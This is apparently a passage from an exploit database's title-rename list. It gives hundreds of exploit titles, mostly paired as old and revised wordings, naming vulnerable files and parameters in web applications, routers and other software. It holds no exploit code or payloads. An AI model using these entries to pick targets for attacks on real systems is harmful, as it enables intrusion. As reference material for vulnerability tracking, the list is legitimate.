'CHTTPResponse::GetHttpResponse()' Stack Buffer Overflow NETGEAR D6300B - '/diag.cgi' 'IPAddr4' Parameter Remote Command Execution NETGEAR D6300B - '/diag.cgi IPAddr4' Parameter Remote Command Execution lxml - 'clean_html' Function Security Bypass lxml - 'clean_html' Security Bypass Alfresco - '/proxy' 'endpoint' Parameter Server-Side Request Forgery Alfresco - '/cmisbrowser' 'url' Parameter Server-Side Request Forgery Alfresco - '/proxy endpoint' Parameter Server-Side Request Forgery Alfresco - '/cmisbrowser url' Parameter Server-Side Request Forgery Laravel - 'Hash::make()' Function Password Truncation Security Laravel - 'Hash::make()' Password Truncation Security OrientDB 2.2.2 - 2.2.22 - Remote Code Execution (Metasploit) OrientDB 2.2.2 < 2.2.22 - Remote Code Execution (Metasploit) Windows - (DCOM RPC2) Universal Shellcode Windows - DCOM RPC2 Universal Shellcode Linux/CRISv32 - Axis Communication - Reverse TCP /bin/sh Shell (192.168.57.1:443/TCP) Shellcode (189 bytes) Linux/CRISv32 Axis Communication - Reverse TCP /bin/sh Shell (192.168.57.1:443/TCP) Shellcode (189 bytes) Cyphor 0.19 - (board takeover) SQL Injection Cyphor 0.19 - Board Takeover SQL Injection PHPay 2.02 - 'nu_mail.inc.php' 'mail()' Remote Injection PHPay 2.02 - 'nu_mail.inc.php mail()' Remote Injection PHPMyNews 1.4 - (cfg_include_dir) Remote File Inclusion PHPMyNews 1.4 - 'cfg_include_dir' Remote File Inclusion Flatnuke 2.5.8 - (userlang) Local Inclusion / Delete All Users Exploit Flatnuke 2.5.8 - 'userlang' Local Inclusion / Delete All Users Exploit Yrch 1.0 - 'plug.inc.php' 'path' Parameter Remote File Inclusion Yrch 1.0 - 'plug.inc.phppath' Parameter Remote File Inclusion Cacti 0.8.6i - 'cmd.php' 'popen()' Remote Injection Cacti 0.8.6i - 'cmd.php popen()' Remote Injection Vizayn Haber - 'haberdetay.asp' 'id' Parameter SQL Injection Vizayn Haber - 'haberdetay.asp id' Parameter SQL Injection iG Calendar 1.0 - 'user.php' 'id' Parameter SQL Injection iG Calendar 1.0 - 'user.php id' Parameter SQL Injection MGB 0.5.4.5 - 'email.php' 'id' Parameter SQL Injection MGB 0.5.4.5 - 'email.php id' Parameter SQL Injection Original 0.11 - 'config.inc.php' 'x[1]' Remote File Inclusion Original 0.11 - 'config.inc.php x[1]' Remote File Inclusion Picturesolution 2.1 - 'config.php' 'path' Remote File Inclusion Picturesolution 2.1 - 'config.php path' Remote File Inclusion PHP Homepage M 1.0 - galerie.php SQL Injection PHP Homepage M 1.0 - 'galerie.php' SQL Injection cpDynaLinks 1.02 - category.php SQL Injection cpDynaLinks 1.02 - 'category.php' SQL Injection DFF PHP Framework API (Data Feed File) - Remote File Inclusion DFF PHP Framework API - 'Data Feed File' Remote File Inclusion WebBiscuits Modules Controller 1.1 - Remote File Inclusion / RFD WebBiscuits Modules Controller 1.1 - Remote File Inclusion / Remote File Disclosure dMx READY (25 - Products) - Remote Database Disclosure dMx READ - Remote Database Disclosure Access2asp - imageLibrary - Arbitrary File Upload Access2asp - 'imageLibrar' Arbitrary File Upload Auktionshaus 3.0.0.1 - 'news.php' 'id' SQL Injection Auktionshaus 3.0.0.1 - 'news.php id' SQL Injection Bild Flirt System 2.0 - 'index.php' 'id' SQL Injection Bild Flirt System 2.0 - 'index.php id' SQL Injection Fast Free Media 1.3 - Adult Site - Arbitrary File Upload Fast Free Media 1.3 Adult Site - Arbitrary File Upload goffgrafix - Design's - SQL Injection goffgrafix Design's - SQL Injection Bilder Upload Script - Datei Upload 1.09 - Arbitrary File Upload Bilder Upload Script Datei Upload 1.09 - Arbitrary File Upload Allomani - E-Store 1.0 - Cross-Site Request Forgery (Add Admin) Allomani - Super MultiMedia 2.5 - Cross-Site Request Forgery (Add Admin) Allomani E-Store 1.0 - Cross-Site Request Forgery (Add Admin) Allomani Super MultiMedia 2.5 - Cross-Site Request Forgery (Add Admin) E-Xoopport - Samsara 3.1 (Sections Module) - Blind SQL Injection E-Xoopport Samsara 3.1 (Sections Module) - Blind SQL Injection E-Xoopport - Samsara 3.1 (eCal Module) - Blind SQL Injection E-Xoopport Samsara 3.1 (eCal Module) - Blind SQL Injection WordPress 3.0.1 - 'do_trackbacks()' function SQL Injection WordPress 3.0.1 - 'do_trackbacks()' SQL Injection Oracle WebLogic - Session Fixation Via HTTP POST Oracle WebLogic - POST Session Fixation spidaNews 1.0 - 'news.php' 'id' SQL Injection spidaNews 1.0 - 'news.php id' SQL Injection Catalog Builder - eCommerce Software - Blind SQL Injection Catalog Builder eCommerce Software - Blind SQL Injection FileBox - File Hosting & Sharing Script 1.5 - SQL Injection FileBox File Hosting & Sharing Script 1.5 - SQL Injection Snortreport - nmap.php and nbtscan.php Remote Command Execution (Metasploit) Snortreport - 'nmap.php' / 'nbtscan.php' Remote Command Execution (Metasploit) jbShop - e107 7 CMS Plugin - SQL Injection jbShop e107 7 CMS Plugin - SQL Injection Tine 2.0 - Maischa - Multiple Cross-Site Scripting Vulnerabilities Tine 2.0 - Maischa Multiple Cross-Site Scripting Vulnerabilities 4Images - Image Gallery Management System - Cross-Site Request Forgery 4Images Image Gallery Management System - Cross-Site Request Forgery PHP Ticket System Beta 1 - 'index.php' 'p' Parameter SQL Injection PHP Ticket System Beta 1 - 'index.php p' Parameter SQL Injection X-Cart Gold 4.5 - 'products_map.php' 'symb' Parameter Cross-Site Scripting X-Cart Gold 4.5 - 'products_map.php symb' Parameter Cross-Site Scripting Symantec Web Gateway 5.0.2 - 'blocked.php' 'id' Parameter Blind SQL Injection Symantec Web Gateway 5.0.2 - 'blocked.php id' Parameter Blind SQL Injection Symantec Web Gateway 5.0.3.18 - 'deptUploads_data.php' 'groupid' Parameter Blind SQL Injection Symantec Web Gateway 5.0.3.18 - 'deptUploads_data.php groupid' Parameter Blind SQL Injection YourArcadeScript 2.4 - 'index.php' 'id' Parameter SQL Injection YourArcadeScript 2.4 - 'index.php id' Parameter SQL Injection AV Arcade Free Edition - 'add_rating.php' 'id' Parameter Blind SQL Injection AV Arcade Free Edition - 'add_rating.php id' Parameter Blind SQL Injection PhpTax - pfilez Parameter Exec Remote Code Injection (Metasploit) PhpTax - 'pfilez' Parameter Exec Remote Code Injection (Metasploit) phpMyAdmin 3.5.2.2 - server_sync.php Backdoor (Metasploit) phpMyAdmin 3.5.2.2 - 'server_sync.php' Backdoor (Metasploit) Blog Mod 0.1.9 - 'index.php' 'month' Parameter SQL Injection Blog Mod 0.1.9 - 'index.php month' Parameter SQL Injection SurfControl SuperScout Email Filter 3.5 - MsgError.asp Cross-Site Scripting SurfControl SuperScout Email Filter 3.5 - 'MsgError.asp' Cross-Site Scripting PHPReactor 1.2.7 pl1 - browse.php Cross-Site Scripting PHPReactor 1.2.7 pl1 - 'browse.php' Cross-Site Scripting PHPRank 1.8 - add.php Cross-Site Scripting PHPRank 1.8 - 'add.php' Cross-Site Scripting MyBB Profile Albums Plugin 0.9 - 'albums.php' 'album' Parameter SQL Injection MyBB Profile Albums Plugin 0.9 - 'albums.php album' Parameter SQL Injection M-TECH P-Synch 6.2.5 - 'nph-psf.exe' 'css' Parameter Remote File Inclusion M-TECH P-Synch 6.2.5 - 'nph-psa.exe' 'css' Parameter Remote File Inclusion M-TECH P-Synch 6.2.5 - 'nph-psf.exe css' Parameter Remote File Inclusion M-TECH P-Synch 6.2.5 - 'nph-psa.exe css' Parameter Remote File Inclusion friendsinwar FAQ Manager - 'view_faq.php' 'question' Parameter SQL Injection friendsinwar FAQ Manager - 'view_faq.php question' Parameter SQL Injection SmartCMS - 'index.php' 'idx' Parameter SQL Injection SmartCMS - 'index.php idx' Parameter SQL Injection SmartCMS - 'index.php' 'menuitem' Parameter SQL Injection / Cross-Site Scripting SmartCMS - 'index.php menuitem' Parameter SQL Injection / Cross-Site Scripting PHP-Nuke 6.6 - admin.php SQL Injection PHP-Nuke 6.6 - 'admin.php' SQL Injection MyBB AwayList Plugin - 'index.php' 'id' Parameter SQL Injection MyBB AwayList Plugin - 'index.php id' Parameter SQL Injection WarpSpeed 4nAlbum Module 0.92 - 'displaycategory.php' 'basepath' Parameter Remote File Inclusion WarpSpeed 4nAlbum Module 0.92 - 'displaycategory.php basepath' Parameter Remote File Inclusion PHP-Nuke Error Manager Module 2.1 - 'error.php' 'language' Parameter Full Path Disclosure PHP-Nuke Error Manager Module 2.1 - 'error.php language' Parameter Full Path Disclosure phpHeaven phpMyChat 0.14.5 - 'edituser.php3' 'do_not_login' Parameter Authentication Bypass phpHeaven phpMyChat 0.14.5 - 'edituser.php3 do_not_login' Parameter Authentication Bypass NConf 1.3 - 'detail.php' 'detail_admin_items.php' 'id' Parameter SQL Injection NConf 1.3 - 'detail.php detail_admin_items.php id' Parameter SQL Injection AdaptCMS 2.0.4 - 'config.php' 'question' Parameter SQL Injection AdaptCMS 2.0.4 - 'config.php question' Parameter SQL Injection Scripts Genie Domain Trader - 'catalog.php' 'id' Parameter SQL Injection Scripts Genie Domain Trader - 'catalog.php id' Parameter SQL Injection Scripts Genie Games Site Script - 'index.php' 'id' Parameter SQL Injection Scripts Genie Games Site Script - 'index.php id' Parameter SQL Injection Scripts Genie Top Sites - 'out.php' 'id' Parameter SQL Injection Scripts Genie Top Sites - 'out.php id' Parameter SQL Injection Scripts Genie Hot Scripts Clone - 'showcategory.php' 'cid' Parameter SQL Injection Scripts Genie Hot Scripts Clone - 'showcategory.php cid' Parameter SQL Injection PHPMyRecipes 1.2.2 - 'viewrecipe.php' 'r_id' Parameter SQL Injection PHPMyRecipes 1.2.2 - 'viewrecipe.php r_id' Parameter SQL Injection MTP Image Gallery 1.0 - 'edit_photos.php' 'title' Parameter Cross-Site Scripting MTP Image Gallery 1.0 - 'edit_photos.php title' Parameter Cross-Site Scripting DCP-Portal 3.7/4.x/5.x - 'announcement.php' 'cid' Parameter Cross-Site Scripting DCP-Portal 3.7/4.x/5.x - 'news.php' 'cid' Parameter Cross-Site Scripting DCP-Portal 3.7/4.x/5.x - 'contents.php' 'cid' Parameter Cross-Site Scripting DCP-Portal 3.7/4.x/5.x - 'announcement.php cid' Parameter Cross-Site Scripting DCP-Portal 3.7/4.x/5.x - 'news.php cid' Parameter Cross-Site Scripting DCP-Portal 3.7/4.x/5.x - 'contents.php cid' Parameter Cross-Site Scripting UBBCentral UBB.Threads 6.2.3/6.5 - 'showflat.php' 'Cat' Parameter Cross-Site Scripting UBBCentral UBB.Threads 6.2.3/6.5 - 'calendar.php' 'Cat' Parameter Cross-Site Scripting UBBCentral UBB.Threads 6.2.3/6.5 - 'login.php' 'Cat' Parameter Cross-Site Scripting UBBCentral UBB.Threads 6.2.3/6.5 - 'online.php' 'Cat' Parameter Cross-Site Scripting UBBCentral UBB.Threads 6.2.3/6.5 - 'showflat.php Cat' Parameter Cross-Site Scripting UBBCentral UBB.Threads 6.2.3/6.5 - 'calendar.php Cat' Parameter Cross-Site Scripting UBBCentral UBB.Threads 6.2.3/6.5 - 'login.php Cat' Parameter Cross-Site Scripting UBBCentral UBB.Threads 6.2.3/6.5 - 'online.php Cat' Parameter Cross-Site Scripting PHPGedView 2.5/2.6 - 'login.php' 'Username' Parameter Cross-Site Scripting PHPGedView 2.5/2.6 - 'login.php Username' Parameter Cross-Site Scripting Rebus:list - 'list.php' 'list_id' Parameter SQL Injection Rebus:list - 'list.php list_id' Parameter SQL Injection SynConnect Pms - 'index.php' 'loginid' Parameter SQL Injection SynConnect Pms - 'index.php loginid' Parameter SQL Injection AWS Xms 2.5 - 'importer.php' 'what' Parameter Directory Traversal Pollen CMS 0.6 - 'index.php' 'p' Paramete' Local File Disclosure AWS Xms 2.5 - 'importer.php what' Parameter Directory Traversal Pollen CMS 0.6 - 'index.php p' Paramete' Local File Disclosure WHMCompleteSolution (WHMCS) Group Pay Plugin 1.5 - 'grouppay.php' 'hash Parameter SQL Injection WHMCompleteSolution (WHMCS) Group Pay Plugin 1.5 - 'grouppay.php hash' Parameter SQL Injection CubeCart 2.0.x - 'tellafriend.php' 'product' Parameter Full Path Disclosure CubeCart 2.0.x - 'view_cart.php' 'add' Parameter Full Path Disclosure CubeCart 2.0.x - 'view_product.php' 'product' Parameter Full Path Disclosure CubeCart 2.0.x - 'tellafriend.php product' Parameter Full Path Disclosure CubeCart 2.0.x - 'view_cart.php add' Parameter Full Path Disclosure CubeCart 2.0.x - 'view_product.php product' Parameter Full Path Disclosure WHMCS 4.x - 'invoicefunctions.php' 'id' Parameter SQL Injection WHMCS 4.x - 'invoicefunctions.php id' Parameter SQL Injection AVE.CMS 2.09 - 'index.php' 'module' Parameter Blind SQL Injection AVE.CMS 2.09 - 'index.php module' Parameter Blind SQL Injection RadioCMS 2.2 - 'menager.php' 'playlist_id' Parameter SQL Injection RadioCMS 2.2 - 'menager.php playlist_id' Parameter SQL Injection SPIP - CMS < 2.0.23/ 2.1.22/3.0.9 - Privilege Escalation SPIP CMS < 2.0.23/ 2.1.22/3.0.9 - Privilege Escalation FlatNuke 2.5.x - 'index.php' 'where' Parameter Full Path Disclosure FlatNuke 2.5.x - 'index.php where' Parameter Full Path Disclosure UBBCentral UBB.Threads 5.5.1/6.x - 'download.php' 'Number' Parameter SQL Injection UBBCentral UBB.Threads 5.5.1/6.x - 'download.php Number' Parameter SQL Injection UBBCentral UBB.Threads 5.5.1/6.x - 'modifypost.php' 'Number' Parameter SQL Injection UBBCentral UBB.Threads 5.5.1/6.x - 'viewmessage.php' 'message' Parameter SQL Injection UBBCentral UBB.Threads 5.5.1/6.x - 'addfav.php' 'main' Parameter SQL Injection UBBCentral UBB.Threads 5.5.1/6.x - 'notifymod.php' 'Number' Parameter SQL Injection UBBCentral UBB.Threads 5.5.1/6.x - 'grabnext.php' 'posted' Parameter SQL Injection UBBCentral UBB.Threads 5.5.1/6.x - 'modifypost.php Number' Parameter SQL Injection UBBCentral UBB.Threads 5.5.1/6.x - 'viewmessage.php message' Parameter SQL Injection UBBCentral UBB.Threads 5.5.1/6.x - 'addfav.php main' Parameter SQL Injection UBBCentral UBB.Threads 5.5.1/6.x - 'notifymod.php Number' Parameter SQL Injection UBBCentral UBB.Threads 5.5.1/6.x - 'grabnext.php posted' Parameter SQL Injection osTicket 1.2/1.3 - 'view.php' 'inc' Parameter Arbitrary Local File Inclusion osTicket 1.2/1.3 - 'view.php inc' Parameter Arbitrary Local File Inclusion Ruubikcms 1.1.1 - 'tinybrowser.php' 'folder' Parameter Directory Traversal DS3 - Authentication Server - Multiple Vulnerabilities Ruubikcms 1.1.1 - 'tinybrowser.php folder' Parameter Directory Traversal DS3 Authentication Server - Multiple Vulnerabilities Kayako LiveResponse 2.0 - 'index.php' 'Username' Parameter Cross-Site Scripting Kayako LiveResponse 2.0 - 'index.php Username' Parameter Cross-Site Scripting Utopia News Pro 1.1.3 - 'header.php' 'sitetitle' Parameter Cross-Site Scripting Utopia News Pro 1.1.3 - 'header.php sitetitle' Parameter Cross-Site Scripting Simple PHP Agenda 2.2.8 - 'edit_event.php' 'eventid' Parameter SQL Injection Simple PHP Agenda 2.2.8 - 'edit_event.php eventid' Parameter SQL Injection Aenovo - '/Password/default.asp' Password Field SQL Injection Aenovo - '/incs/searchdisplay.asp' strSQL Parameter SQL Injection Aenovo - '/Password/default.asp Password' SQL Injection Aenovo - '/incs/searchdisplay.asp strSQL' Parameter SQL Injection vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/usertitle.php' 'usertitleid' Parameter SQL Injection vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/usertools.php' 'ids' Parameter SQL Injection vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/usertitle.php usertitleid' Parameter SQL Injection vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/usertools.php ids' Parameter SQL Injection vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/css.php' 'group' Parameter Cross-Site Scripting vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/css.php group' Parameter Cross-Site Scripting vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/user.php' 'email' Parameter Cross-Site Scripting vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/language.php' 'goto' Parameter Cross-Site Scripting vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/modlog.php' 'orderby' Parameter Cross-Site Scripting vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/user.php email' Parameter Cross-Site Scripting vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/language.php goto' Parameter Cross-Site Scripting vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/modlog.php orderby' Parameter Cross-Site Scripting Cyphor 0.19 - lostpwd.php nick Field SQL Injection Cyphor 0.19 - 'newmsg.php' fid Parameter SQL Injection Cyphor 0.19 - footer.php t_login Parameter Cross-Site Scripting Cyphor 0.19 - 'lostpwd.php nick' SQL Injection Cyphor 0.19 - 'newmsg.php fid' Parameter SQL Injection Cyphor 0.19 - 'footer.php t_login' Parameter Cross-Site Scripting MySource 2.14 - 'Socket.php' 'PEAR_PATH' Remote File Inclusion MySource 2.14 - 'Request.php' 'PEAR_PATH' Remote File Inclusion MySource 2.14 - 'Socket.php PEAR_PATH' Remote File Inclusion MySource 2.14 - 'Request.php PEAR_PATH' Remote File Inclusion MySource 2.14 - 'mail.php' 'PEAR_PATH' Remote File Inclusion MySource 2.14 - 'Date.php' 'PEAR_PATH' Remote File Inclusion MySource 2.14 - 'Span.php' 'PEAR_PATH' Remote File Inclusion MySource 2.14 - 'mimeDecode.php' 'PEAR_PATH' Remote File Inclusion MySource 2.14 - 'mime.php' 'PEAR_PATH' Remote File Inclusion MySource 2.14 - 'mail.php PEAR_PATH' Remote File Inclusion MySource 2.14 - 'Date.php PEAR_PATH' Remote File Inclusion MySource 2.14 - 'Span.php PEAR_PATH' Remote File Inclusion MySource 2.14 - 'mimeDecode.php PEAR_PATH' Remote File Inclusion MySource 2.14 - 'mime.php PEAR_PATH' Remote File Inclusion Top Games Script 1.2 - 'play.php' 'gid' Parameter SQL Injection Top Games Script 1.2 - 'play.php gid' Parameter SQL Injection Elemata CMS RC3.0 - 'global.php' 'id' Parameter SQL Injection Elemata CMS RC3.0 - 'global.php id' Parameter SQL Injection PHP-Charts 1.0 - 'index.php' 'type' Parameter Remote Code Execution PHP-Charts 1.0 - 'index.php type' Parameter Remote Code Execution PHPList Mailing List Manager 2.x - '/admin/admin.php' 'id' Parameter SQL Injection PHPList Mailing List Manager 2.x - '/admin/editattributes.php' 'id' Parameter SQL Injection PHPList Mailing List Manager 2.x - '/admin/admin.php id' Parameter SQL Injection PHPList Mailing List Manager 2.x - '/admin/editattributes.php id' Parameter SQL Injection PHPList Mailing List Manager 2.x - '/admin/configure.php' 'id' Parameter Cross-Site Scripting PHPList Mailing List Manager 2.x - '/admin/users.php' 'find' Parameter Cross-Site Scripting PHPList Mailing List Manager 2.x - '/admin/configure.php id' Parameter Cross-Site Scripting PHPList Mailing List Manager 2.x - '/admin/users.php find' Parameter Cross-Site Scripting Walla TeleSite 3.0 - 'ts.exe' 'tsurl' Parameter Arbitrary Article Access Walla TeleSite 3.0 - 'ts.exe' 'sug' Parameter Cross-Site Scripting Walla TeleSite 3.0 - 'ts.exe' 'sug' Parameter SQL Injection Walla TeleSite 3.0 - 'ts.exe tsurl' Parameter Arbitrary Article Access Walla TeleSite 3.0 - 'ts.exe sug' Parameter Cross-Site Scripting Walla TeleSite 3.0 - 'ts.exe sug' Parameter SQL Injection GLPI 0.83.9 - 'Unserialize()' Function Remote Code Execution GLPI 0.83.9 - 'Unserialize()' Remote Code Execution Binary Board System 0.2.5 - 'toc.pl' 'board' Parameter Cross-Site Scripting Binary Board System 0.2.5 - 'toc.pl board' Parameter Cross-Site Scripting Cerberus Helpdesk 2.649 - 'cer_KnowledgebaseHandler.class.php' '_load_article_details' Function SQL Injection Cerberus Helpdesk 2.649 - 'cer_KnowledgebaseHandler.class.php _load_article_details' SQL Injection IceWarp Universal WebMail - '/dir/include.html' 'lang' Parameter Local File Inclusion IceWarp Universal WebMail - '/mail/settings.html' 'Language' Parameter Local File Inclusion IceWarp Universal WebMail - '/mail/index.html' 'lang_settings' Parameter Remote File Inclusion IceWarp Universal WebMail - '/dir/include.html lang' Parameter Local File Inclusion IceWarp Universal WebMail - '/mail/settings.html Language' Parameter Local File Inclusion IceWarp Universal WebMail - '/mail/index.html lang_settings' Parameter Remote File Inclusion OnePlug CMS - '/press/details.asp' 'Press_Release_ID' Parameter SQL Injection OnePlug CMS - '/services/details.asp' 'Service_ID' Parameter SQL Injection OnePlug CMS - '/products/details.asp' 'Product_ID' Parameter SQL Injection OnePlug CMS - '/press/details.asp Press_Release_ID' Parameter SQL Injection OnePlug CMS - '/services/details.asp Service_ID' Parameter SQL Injection OnePlug CMS - '/products/details.asp Product_ID' Parameter SQL Injection aoblogger 2.3 - 'login.php' 'Username' Field SQL Injection aoblogger 2.3 - 'login.php Username' SQL Injection HiveMail 1.2.2/1.3 - 'addressbook.update.php' 'contactgroupid' Parameter Arbitrary PHP Command Execution HiveMail 1.2.2/1.3 - 'folders.update.php' 'folderid' Parameter Arbitrary PHP Command Execution HiveMail 1.2.2/1.3 - 'addressbook.update.php contactgroupid' Parameter Arbitrary PHP Command Execution HiveMail 1.2.2/1.3 - 'folders.update.php folderid' Parameter Arbitrary PHP Command Execution ImageVue 0.16.1 - 'readfolder.php' 'path' Parameter Arbitrary Directory Listing ImageVue 0.16.1 - 'readfolder.php path' Parameter Arbitrary Directory Listing Virtual Hosting Control System 2.2/2.4 - 'login.php' 'check_login()' Function Authentication Bypass Virtual Hosting Control System 2.2/2.4 - 'login.php check_login()' Authentication Bypass dotProject 2.0 - '/modules/projects/gantt.php' 'dPconfig[root_dir]' Parameter Remote File Inclusion dotProject 2.0 - '/includes/db_connect.php' 'baseDir' Parameter Remote File Inclusion dotProject 2.0 - '/includes/session.php' 'baseDir' Parameter Remote File Inclusion dotProject 2.0 - '/modules/projects/gantt2.php' 'dPconfig[root_dir]' Parameter Remote File Inclusion dotProject 2.0 - '/modules/projects/vw_files.php' 'dPconfig[root_dir]' Parameter Remote File Inclusion dotProject 2.0 - '/modules/admin/vw_usr_roles.php' 'baseDir' Parameter Remote File Inclusion dotProject 2.0 - '/modules/public/calendar.php' 'baseDir' Parameter Remote File Inclusion dotProject 2.0 - '/modules/public/date_format.php' 'baseDir' Parameter Remote File Inclusion dotProject 2.0 - '/modules/tasks/gantt.php' 'baseDir' Parameter Remote File Inclusion dotProject 2.0 - '/modules/projects/gantt.php dPconfig[root_dir]' Parameter Remote File Inclusion dotProject 2.0 - '/includes/db_connect.php baseDir' Parameter Remote File Inclusion dotProject 2.0 - '/includes/session.php baseDir' Parameter Remote File Inclusion dotProject 2.0 - '/modules/projects/gantt2.php dPconfig[root_dir]' Parameter Remote File Inclusion dotProject 2.0 - '/modules/projects/vw_files.php dPconfig[root_dir]' Parameter Remote File Inclusion dotProject 2.0 - '/modules/admin/vw_usr_roles.php baseDir' Parameter Remote File Inclusion dotProject 2.0 - '/modules/public/calendar.php baseDir' Parameter Remote File Inclusion dotProject 2.0 - '/modules/public/date_format.php baseDir' Parameter Remote File Inclusion dotProject 2.0 - '/modules/tasks/gantt.php baseDir' Parameter Remote File Inclusion Ginkgo CMS - 'index.php' 'rang' Parameter SQL Injection Ginkgo CMS - 'index.php rang' Parameter SQL Injection Telmanik CMS Press 1.01b - 'pages.php' 'page_name' Parameter SQL Injection Telmanik CMS Press 1.01b - 'pages.php page_name' Parameter SQL Injection sBlog 0.7.2 - 'search.php' 'keyword' Parameter POST Method Cross-Site Scripting sBlog 0.7.2 - 'search.php keyword' Parameter POST Method Cross-Site Scripting MLMAuction Script - 'gallery.php' 'id' Parameter SQL Injection MLMAuction Script - 'gallery.php id' Parameter SQL Injection PHPMyForum 4.0 - 'index.php' 'type' Parameter CRLF Injection PHPMyForum 4.0 - 'index.php type' Parameter CRLF Injection 321soft PHP-Gallery 0.9 - 'index.php' 'path' Parameter Arbitrary Directory Listing 321soft PHP-Gallery 0.9 - 'index.php path' Parameter Arbitrary Directory Listing timobraun Dynamic Galerie 1.0 - 'index.php' 'pfad' Parameter Arbitrary Directory Listing timobraun Dynamic Galerie 1.0 - 'galerie.php' 'pfad' Parameter Arbitrary Directory Listing timobraun Dynamic Galerie 1.0 - 'index.php pfad' Parameter Arbitrary Directory Listing timobraun Dynamic Galerie 1.0 - 'galerie.php pfad' Parameter Arbitrary Directory Listing Gphotos 1.4/1.5 - 'index.php' 'rep' Parameter Traversal Arbitrary Directory Listing Gphotos 1.4/1.5 - 'index.php rep' Parameter Traversal Arbitrary Directory Listing Woltlab Burning Board FLVideo Addon - 'video.php' 'value' Parameter SQL Injection Woltlab Burning Board FLVideo Addon - 'video.php value' Parameter SQL Injection ATutor 1.5.x - 'admin/fix_content.php' 'submit' Parameter Cross-Site Scripting ATutor 1.5.x - 'admin/fix_content.php submit' Parameter Cross-Site Scripting glFusion 1.3.0 - 'search.php' 'cat_id' Parameter SQL Injection glFusion 1.3.0 - 'search.php cat_id' Parameter SQL Injection Geodesic Solutions Multiple Products - 'index.php' 'b' Parameter SQL Injection Geodesic Solutions Multiple Products - 'index.php b' Parameter SQL Injection RadScripts - 'a_editpage.php' 'Filename' Parameter Arbitrary File Overwrite RadScripts - 'a_editpage.php Filename' Parameter Arbitrary File Overwrite WoW Roster 1.5 - 'hsList.php' 'subdir' Parameter Remote File Inclusion WoW Roster 1.5 - 'hsList.php subdir' Parameter Remote File Inclusion Zen Cart Web Shopping Cart 1.x - 'autoload_func.php' 'autoLoadConfig[999][0][loadFile]' Parameter Remote File Inclusion Zen Cart Web Shopping Cart 1.x - 'autoload_func.php autoLoadConfig[999][0][loadFile]' Parameter Remote File Inclusion vTiger CRM 5.4.0 - 'index.php' 'onlyforuser' Parameter SQL Injection vTiger CRM 5.4.0 - 'index.php onlyforuser' Parameter SQL Injection osCommerce 2.2 - 'admin/orders_status.php' 'page' Parameter Cross-Site Scripting osCommerce 2.2 - 'admin/products_attributes.php' 'page' Parameter Cross-Site Scripting osCommerce 2.2 - 'admin/orders_status.php page' Parameter Cross-Site Scripting osCommerce 2.2 - 'admin/products_attributes.php page' Parameter Cross-Site Scripting DCP-Portal 6.0 - 'login.php' 'Username' Parameter SQL Injection DCP-Portal 6.0 - 'login.php Username' Parameter SQL Injection CubeCart 3.0.x - '/admin/print_order.php' 'order_id' Parameter Cross-Site Scripting CubeCart 3.0.x - '/admin/print_order.php order_id' Parameter Cross-Site Scripting CubeCart 3.0.x - '/admin/image.php' 'image' Parameter Cross-Site Scripting CubeCart 3.0.x - '/admin/image.php image' Parameter Cross-Site Scripting CubeCart 3.0.x - '/footer.inc.php' 'la_pow_by' Parameter Cross-Site Scripting CubeCart 3.0.x - '/footer.inc.php la_pow_by' Parameter Cross-Site Scripting osCommerce 2.2 - 'admin/banner_manager.php' 'page' Parameter Cross-Site Scripting osCommerce 2.2 - 'admin/banner_statistics.php' 'page' Parameter Cross-Site Scripting osCommerce 2.2 - 'admin/countries.php' 'page' Parameter Cross-Site Scripting osCommerce 2.2 - 'admin/currencies.php' 'page' Parameter Cross-Site Scripting osCommerce 2.2 - 'admin/languages.php' 'page' Parameter Cross-Site Scripting osCommerce 2.2 - 'admin/manufacturers.php' 'page' Parameter Cross-Site Scripting osCommerce 2.2 - 'admin/products_expected.php' 'page' Parameter Cross-Site Scripting osCommerce 2.2 - 'admin/reviews.php' 'page' Parameter Cross-Site Scripting osCommerce 2.2 - 'admin/specials.php' 'page' Parameter Cross-Site Scripting osCommerce 2.2 - 'admin/stats_products_purchased.php' 'page' Parameter Cross-Site Scripting osCommerce 2.2 - 'admin/stats_products_viewed.php' 'page' Parameter Cross-Site Scripting osCommerce 2.2 - 'admin/tax_classes.php' 'page' Parameter Cross-Site Scripting osCommerce 2.2 - 'admin/tax_rates.php' 'page' Parameter Cross-Site Scripting osCommerce 2.2 - 'admin/zones.php' 'page' Parameter Cross-Site Scripting osCommerce 2.2 - 'admin/banner_manager.php page' Parameter Cross-Site Scripting osCommerce 2.2 - 'admin/banner_statistics.php page' Parameter Cross-Site Scripting osCommerce 2.2 - 'admin/countries.php page' Parameter Cross-Site Scripting osCommerce 2.2 - 'admin/currencies.php page' Parameter Cross-Site Scripting osCommerce 2.2 - 'admin/languages.php page' Parameter Cross-Site Scripting osCommerce 2.2 - 'admin/manufacturers.php page' Parameter Cross-Site Scripting osCommerce 2.2 - 'admin/products_expected.php page' Parameter Cross-Site Scripting osCommerce 2.2 - 'admin/reviews.php page' Parameter Cross-Site Scripting osCommerce 2.2 - 'admin/specials.php page' Parameter Cross-Site Scripting osCommerce 2.2 - 'admin/stats_products_purchased.php page' Parameter Cross-Site Scripting osCommerce 2.2 - 'admin/stats_products_viewed.php page' Parameter Cross-Site Scripting osCommerce 2.2 - 'admin/tax_classes.php page' Parameter Cross-Site Scripting osCommerce 2.2 - 'admin/tax_rates.php page' Parameter Cross-Site Scripting osCommerce 2.2 - 'admin/zones.php page' Parameter Cross-Site Scripting ISearch 2.16 - ISEARCH_PATH Parameter Remote File Inclusion ISearch 2.16 - 'ISEARCH_PATH' Parameter Remote File Inclusion Evandor Easy notesManager 0.0.1 - 'login.php' 'Username' Parameter SQL Injection Evandor Easy notesManager 0.0.1 - 'login.php Username' Parameter SQL Injection Dolibarr ERP/CMS 3.4.0 - 'exportcsv.php' 'sondage' Parameter SQL Injection Dolibarr ERP/CMS 3.4.0 - 'exportcsv.php sondage' Parameter SQL Injection BirdBlog 1.4 - '/admin/admincore.php' 'msg' Parameter Cross-Site Scripting BirdBlog 1.4 - '/admin/comments.php' 'month' Parameter Cross-Site Scripting BirdBlog 1.4 - '/admin/entries.php' 'month' 